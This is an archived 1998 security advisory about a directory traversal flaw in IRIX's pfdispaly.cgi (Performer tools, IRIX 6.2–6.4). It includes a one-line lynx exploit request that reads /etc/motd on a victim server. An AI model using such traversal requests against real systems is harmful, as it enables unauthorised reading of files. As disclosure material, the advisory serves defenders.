home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / •New Files / Happle#10 / Files / hack_part2.sit / hack_part2 / pfdisplay.txt < prev    next >
Encoding:
Text File  |  1998-12-09  |  643 b   |  10 lines  |  [TEXT/ttxt]
  1. COMMAND    /var/www/cgi-bin/pfdispaly.cgiSYSTEMS AFFECTED    IRIX 6.2, 6.3, 6.4
  2. PROBLEM    J.A. Gutierrez found following.   If you do not remember  or don't
  3.     know about the /cgi-bin/handler bug, take a look at 'httpd #4'  in
  4.     IRIX section of Security Bugware.  Well, more of the same.  Anyone
  5.     can read files (as 'nobody') from your system.  Exploit:
  6.         lynx -source \
  7.         'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
  8.     The   IRIS   Performer   API   Search   Tool   software  subsystem
  9.     (performer_tools) is  loaded by  default when  installing the IRIX
  10.     Performer 2.2 CD on IRIX 6.2, 6.3 and 6.4